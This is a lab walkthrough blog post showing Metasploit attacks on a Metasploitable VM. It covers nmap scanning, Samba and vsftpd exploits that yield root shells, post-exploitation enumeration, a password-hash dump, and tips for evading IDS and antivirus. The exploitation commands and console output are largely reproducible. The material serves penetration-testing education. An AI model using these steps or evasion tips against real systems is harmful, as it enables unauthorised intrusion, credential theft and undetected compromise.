Tag Archives: Metasploit

Exploiting machines using Metasploit

Metasploit is a powerful tool for exploiting vulnerabilities on remote hosts. Metasploit allows you to trivially run an exploit on a host to execute a payload. I will take a look at some basics of Metasploit and use it to exploit some vulnerabilities in a Metasploitable VM.

Starting up the Metasploit framework from Kali. You will see it under Applications -> Exploitation Tools

msf > version
Framework: 4.11.5-2015121501
Console  : 4.11.5-2015121501.15168

I can execute relevant Linux commands from within the msf console.

msf > ifconfig
[*] exec: ifconfig

eth0      Link encap:Ethernet  HWaddr 00:0c:29:fa:df:2f  
          inet addr:192.168.238.136  Bcast:192.168.238.255  Mask:255.255.255.0
...

I can also use other tools within the msf console.

msf > nmap -sn 192.168.238.0/24
[*] exec: nmap -sn 192.168.238.0/24

Starting Nmap 6.49BETA5 ( https://nmap.org ) at 2016-01-05 18:13 EST
Nmap scan report for 192.168.238.1
Host is up (0.00044s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.238.2
Host is up (0.000050s latency).
MAC Address: 00:50:56:E9:39:5C (VMware)
Nmap scan report for 192.168.238.131
Host is up (0.00049s latency).
MAC Address: 00:0C:29:54:6E:48 (VMware)
Nmap scan report for 192.168.238.254
Host is up (0.00011s latency).
MAC Address: 00:50:56:FF:4C:2F (VMware)
Nmap scan report for 192.168.238.136
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 1.79 seconds

msf > nmap -sV 192.168.238.131
[*] exec: nmap -sV 192.168.238.131


Starting Nmap 6.49BETA5 ( https://nmap.org ) at 2016-01-05 18:30 EST
Nmap scan report for 192.168.238.131
Host is up (0.00014s latency).
Not shown: 977 closed ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp   open  telnet      Linux telnetd
25/tcp   open  smtp        Postfix smtpd
53/tcp   open  domain      ISC BIND 9.4.2
80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp  open  rpcbind     2 (RPC #100000)
139/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
512/tcp  open  exec        netkit-rsh rexecd
513/tcp  open  login?
514/tcp  open  tcpwrapped
1099/tcp open  rmiregistry GNU Classpath grmiregistry
1524/tcp open  shell       Metasploitable root shell
2049/tcp open  nfs         2-4 (RPC #100003)
2121/tcp open  ftp         ProFTPD 1.3.1
3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5
5432/tcp open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open  vnc         VNC (protocol 3.3)
6000/tcp open  X11         (access denied)
6667/tcp open  irc         Unreal ircd
8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
8180/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
MAC Address: 00:0C:29:54:6E:48 (VMware)
Service Info: Hosts:  metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.06 seconds

I will try to gain shell access by exploiting Samba. Metasploit has two ports for Samba open: port 139 and port 445. Port 445 runs Samba over SMB directory over TCP, while port 139 runs Samba over NetBIOS over TCP.

I can search for exploits in the database using the search command:

msf > search Samba

Matching Modules
================

   Name                                            Disclosure Date  Rank       Description
   ----                                            ---------------  ----       -----------
   auxiliary/admin/smb/samba_symlink_traversal                      normal     Samba Symlink Directory Traversal
   auxiliary/dos/samba/lsa_addprivs_heap                            normal     Samba lsa_io_privilege_set Heap Overflow
   auxiliary/dos/samba/lsa_transnames_heap                          normal     Samba lsa_io_trans_names Heap Overflow
...

The results show the name of the exploit, when the exploit was disclosed, a ranking of the exploit (based on stability of the exploit and range of targets), and a description of the exploit including OS and service versions.
Metasploit also offers a grep tool, which can provide more search flexibility at the cost of formatting:

msf > grep -i samba search
   auxiliary/admin/smb/samba_symlink_traversal                                               normal     Samba Symlink Directory Traversal
   auxiliary/dos/samba/lsa_addprivs_heap                                                     normal     Samba lsa_io_privilege_set Heap Overflow
   auxiliary/dos/samba/lsa_transnames_heap                                                   normal     Samba lsa_io_trans_names Heap Overflow
   auxiliary/dos/samba/read_nttrans_ea_list                                                  normal     Samba read_nttrans_ea_list Integer Overflow
   auxiliary/scanner/smb/smb_uninit_cred                                                     normal     Samba _netr_ServerPasswordSet Uninitialized Credential State
   exploit/freebsd/samba/trans2open                                         2003-04-07       great      Samba trans2open Overflow (*BSD x86)
   exploit/linux/samba/chain_reply                                          2010-06-16       good       Samba chain_reply Memory Corruption (Linux x86)

I’ll be limited to exploits against Linux, since my only target is Metasploitable. I’m going to just pick one at random and go from there.

msf > use exploit/linux/samba/lsa_transnames_heap
msf exploit(lsa_transnames_heap) > show options

Module options (exploit/linux/samba/lsa_transnames_heap):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  LSARPC           yes       The pipe name to use


Exploit target:

   Id  Name
   --  ----
   0   Linux vsyscall

RHOST is the target of the attack.

msf exploit(lsa_transnames_heap) > set RHOST 192.168.238.131
RHOST => 192.168.238.131

I will start with a simple exploit to get a shell on the target.

msf exploit(lsa_transnames_heap) > set payload linux/x86/shell/bind_tcp
payload => linux/x86/shell/bind_tcp
msf exploit(lsa_transnames_heap) > show options

Module options (exploit/linux/samba/lsa_transnames_heap):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    192.168.238.131  yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  LSARPC           yes       The pipe name to use


Payload options (linux/x86/shell/bind_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LPORT  4444             yes       The listen port
   RHOST  192.168.238.131  no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Linux vsyscall

It looks like Metasploit has all the information it needs.

msf exploit(lsa_transnames_heap) > exploit

[*] Started bind handler
[*] Creating nop sled....
[*] Trying to exploit Samba with address 0xffffe410...
[*] Connecting to the SMB service...
[-] Exploit aborted due to failure: no-target: This target is not a vulnerable Samba server (Samba 3.0.20-Debian)
[*] Exploit completed, but no session was created.

The exploit didn’t work. Trying the next exploit:

msf exploit(lsa_transnames_heap) > use exploit/linux/samba/setinfopolicy_heap
msf exploit(setinfopolicy_heap) > show options

Module options (exploit/linux/samba/setinfopolicy_heap):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   RHOST                        yes       The target address
   RPORT       445              yes       Set the SMB service port
   StartBrute                   no        Start Address For Brute Forcing
   StopBrute                    no        Stop Address For Brute Forcing


Exploit target:

   Id  Name
   --  ----
   0   2:3.5.11~dfsg-1ubuntu2 on Ubuntu Server 11.10

I need to reset the RHOST and payload when trying a new exploit.

Exploit target:

   Id  Name
   --  ----
   0   2:3.5.11~dfsg-1ubuntu2 on Ubuntu Server 11.10


msf exploit(setinfopolicy_heap) > set RHOST 192.168.238.131
RHOST => 192.168.238.131
msf exploit(setinfopolicy_heap) > set payload linux/x86/shell/bind_tcp
payload => linux/x86/shell/bind_tcp
msf exploit(setinfopolicy_heap) > exploit

[*] Started bind handler
[*] Trying to exploit Samba with address 0xb67f1000...
[-] Server is most likely patched...
[*] Trying to exploit Samba with address 0xb67f2000...
[-] Server is most likely patched...
[*] Trying to exploit Samba with address 0xb67f4000...
[-] Server is most likely patched...
^C[-] Exploit failed: Interrupt 
[*] Exploit completed, but no session was created.

This exploit didn’t work either. Trying another:

msf exploit(setinfopolicy_heap) > use exploit/multi/samba/usermap_script
msf exploit(usermap_script) > show options

Module options (exploit/multi/samba/usermap_script):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  139              yes       The target port


Exploit target:

   Id  Name
   --  ----
   0   Automatic
msf exploit(usermap_script) > set RHOST 192.168.238.131
RHOST => 192.168.238.131
msf exploit(usermap_script) > exploit

[*] Started reverse double handler
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo ciZ6DcyeZcCJsNkV;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "ciZ6DcyeZcCJsNkV\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.238.136:4444 -> 192.168.238.131:33372) at 2016-01-05 19:49:21 -0500

Success! I have a shell on the target. We can press CTRL+Z to save the shell in the background.

^Z
Background session 1? [y/N]  y
msf exploit(usermap_script) >

The usermap script attack exploits a command execution vulnerability in Samba through a username field. Since the username is entered before authentication, this exploit requires no authentication!

At this point, we can do one of two things: payloads or post-exploit scripts:

Metasploit offers over 200 payloads, but not every payload is compatible with every exploit. Most payloads you see only open a reverse shell to Metasploit, but a few unique payloads can add and edit files and users, change file permissions, perform DLL injections, or load Meterpreter. Meterpreter is by far the coolest payload offered by Metasploit. Metasploit resides solely in memory (to leave no trace on the disk), injects code into DLLs (so as to not spawn any processes), and all communication to Meterpreter is encrypted.
Once you get Meterpreter running on a machine, it is totally pwnd. Meterpreter gives you a whole environment on the infected machine to allow you to run commands, capture screenshots of the desktop, view the webcam, move the mouse, and capture keyboard input. Since Meterpreter runs only in memory, it will be gone once the machine restarts. It would be best to backdoor the machine.

Post-exploitation script allow us to gather information, pivot to other machines, sniff the network, set up a backdoor, etc.

msf exploit(usermap_script) > search post/linux/gather

Matching Modules
================

   Name                                     Disclosure Date  Rank    Description
   ----                                     ---------------  ----    -----------
   post/linux/gather/checkvm                                 normal  Linux Gather Virtual Environment Detection
   post/linux/gather/ecryptfs_creds                          normal  Gather eCryptfs Metadata
   post/linux/gather/enum_configs                            normal  Linux Gather Configurations
   post/linux/gather/enum_network                            normal  Linux Gather Network Information
   post/linux/gather/enum_protections                        normal  Linux Gather Protection Enumeration
   post/linux/gather/enum_psk                                normal  Linux Gather 802-11-Wireless-Security Credentials
   post/linux/gather/enum_system                             normal  Linux Gather System and User Information
...

I will use a script to gather information from the machine.

msf exploit(usermap_script) > use post/linux/gather/enum_system

I have a session saved from earlier, which I see using the following command.

msf post(enum_system) > sessions -l

Active sessions
===============

  Id  Type        Information  Connection
  --  ----        -----------  ----------
  1   shell unix               192.168.238.136:4444 -> 192.168.238.131:33372 (192.168.238.131)
sf post(enum_system) > show options

Module options (post/linux/gather/enum_system):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.

msf post(enum_system) > set SESSION 1
SESSION => 1
msf post(enum_system) > exploit

[+] Info:
Login with msfadmin/msfadmin to get starteded network!                     ____  
[+]     Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
[+]     Module running as "root" user
[*] Linux version stored in /root/.msf5/loot/20160105212135_default_192.168.238.131_linux.enum.syste_273307.txt
[*] User accounts stored in /root/.msf5/loot/20160105212135_default_192.168.238.131_linux.enum.syste_703384.txt
[*] Installed Packages stored in /root/.msf5/loot/20160105212135_default_192.168.238.131_linux.enum.syste_304431.txt
[*] Running Services stored in /root/.msf5/loot/20160105212135_default_192.168.238.131_linux.enum.syste_305863.txt
[*] Cron jobs stored in /root/.msf5/loot/20160105212135_default_192.168.238.131_linux.enum.syste_807045.txt
[*] Disk info stored in /root/.msf5/loot/20160105212135_default_192.168.238.131_linux.enum.syste_687962.txt
[*] Logfiles stored in /root/.msf5/loot/20160105212135_default_192.168.238.131_linux.enum.syste_837062.txt
[*] Setuid/setgid files stored in /root/.msf5/loot/20160105212135_default_192.168.238.131_linux.enum.syste_887699.txt
[*] Post module execution completed

There’s a lot of intel in these files. I want to try and gather some password hashes.

msf post(enum_system) > use post/linux/gather/hashdump
msf post(hashdump) > show options

Module options (post/linux/gather/hashdump):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.

msf post(hashdump) > set session 1
session => 1
msf post(hashdump) > exploit

[+] root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:0:0:root:/root:/bin/bash
[+] sys:$1$fUX6BPOt$Miyc3UpOzQJqz4s5wFD9l0:3:3:sys:/dev:/bin/sh
[+] klog:$1$f2ZVMS4K$R9XkI.CmLdHhdUE3X9jqP0:103:104::/home/klog:/bin/false
[+] msfadmin:$1$XN10Zj2c$Rt/zzCW3mLtUWA.ihZjA5/:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
[+] postgres:$1$Rw35ik.x$MgQgZUuO5pAoUvfJhfcYe/:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
[+] user:$1$HESu9xrH$k.o3G93DGoXIiQKkPmUgZ0:1001:1001:just a user,111,,:/home/user:/bin/bash
[+] service:$1$kR3ue7JZ$7GxELDupr5Ohp6cjZ3Bu//:1002:1002:,,,:/home/service:/bin/bash
[+] Unshadowed Password File: /root/.msf5/loot/20160105212317_default_192.168.238.131_linux.hashes_446028.txt
[*] Post module execution completed

For fun, I’ll exploit another service. Metasploitable is running vsftpd, so I’ll search for exploits.

msf post(hashdump) > search vsftp

Matching Modules
================

   Name                                  Disclosure Date  Rank       Description
   ----                                  ---------------  ----       -----------
   exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03       excellent  VSFTPD v2.3.4 Backdoor Command Execution


msf post(hashdump) > use exploit/unix/ftp/vsftpd_234_backdoor
msf exploit(vsftpd_234_backdoor) > show options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  21               yes       The target port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(vsftpd_234_backdoor) > set RHOST 192.168.238.131
RHOST => 192.168.238.131
msf exploit(vsftpd_234_backdoor) > exploit

[*] Banner: 220 (vsFTPd 2.3.4)
[*] USER: 331 Please specify the password.
[+] Backdoor service has been spawned, handling...
[+] UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 2 opened (192.168.238.136:40469 -> 192.168.238.131:6200) at 2016-01-05 21:44:56 -0500

^Z
Background session 2? [y/N]  y

This gives a second session.

msf exploit(vsftpd_234_backdoor) > show sessions

Active sessions
===============

  Id  Type        Information  Connection
  --  ----        -----------  ----------
  1   shell unix               192.168.238.136:4444 -> 192.168.238.131:55821 (192.168.238.131)
  2   shell unix               192.168.238.136:40469 -> 192.168.238.131:6200 (192.168.238.131)

While Metasploit is an amazingly simple tool to use, one should be mindful of what’s going on under the hood to avoid the “script kiddie” moniker. Metasploit. Some things to keep in mind:

  • A decently tuned IDS will probably see you exploiting the service over the wire. Metasploit offers alternate methods of transporting over the wire, as well as different encoding schemes and fragmentation (note: encoding is NOT a good way of avoiding AV). Using an encrypted channel will also render the attack invisible.
  • Depending on the exploit or the payload, antivirus may catch on and mark your payload as malicious. DLL injection is an obvious way of avoiding AV because AV only scans the disk, but some exploits require disk writes. When injecting a payload into another process, Metasploit uses a default executable template which is easily detected by AV, regardless of the presence of a payload. If the target has any sort of AV, it is a good idea to change the executable template.

I’m sure I’ll be doing some more advanced attacks with Metasploit later to show off some more features.